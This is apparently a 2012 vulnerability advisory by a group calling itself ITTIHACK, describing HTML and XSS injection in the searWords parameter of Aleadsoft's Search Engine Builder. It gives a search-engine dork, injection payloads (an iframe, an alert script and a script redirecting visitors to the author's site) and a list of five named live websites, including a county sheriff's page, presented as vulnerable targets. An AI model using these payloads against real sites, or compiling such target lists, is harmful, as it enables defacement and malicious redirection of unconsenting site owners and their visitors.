Search Engine Builder (XSS/HTML) Injection Vulnerabilities

       Software : Search Engine Builder                                                                
       Date     : 2/20/2012                                             
       Vendor   : http://www.aleadsoft.com  
       Get App. : http://www.aleadsoft.com/SearchMakerSetup.exe	   
       Platform : Windows
       Language : ASP	
       Tested on: Windows	   
       Dork     : "Powered by Search Engine Builder"	   
       Author   : ITTIHACK                                                      
       Home     : http://ittihack.com    

       Description:
       Aleadsoft develops both GUI software and web-application to Create search engine for your own website.
       All these softwares run on Windows system and IIS servers, including WIN 9x/ME/NT/2000/XP/2003/Vista/Win7. 	   
                                                                                                                          
	   
	   Exploit: Inject your HTML/XSS codes in the search box;
	   
	   http://site/path/search.php?searWords=[Evil]
	   http://site/path/searchsimple.asp?searWords=[Evil]
	   
	   Demo   :
	   Inject the codes below in the search box (Examples):
	   
	   1) HTML:
	   
	   <center><b><h1><span style='color:yellow;'>ITTIHACK</span></h1></b></p></center>
	   <iframe src="http://www.ittihack.com"></iframe> 
	   
	   2) XSS :
	   
	   <script>alert("XSS")</script>
	   <script>window.location="http://ittihack.com"</script>"
	   
	   
	   http://laramiecounty.com/_departments/_sheriff/search.asp
       http://abytel.com/search/searchsimple.asp
	   http://ottawamalayali.ca/SearchEngine/search.php
	   http://www.h-e-r-m-e-s.org/search.asp
	   http://www.broseley.org.uk/search.asp


May allah have mercy on the martyrs of Syria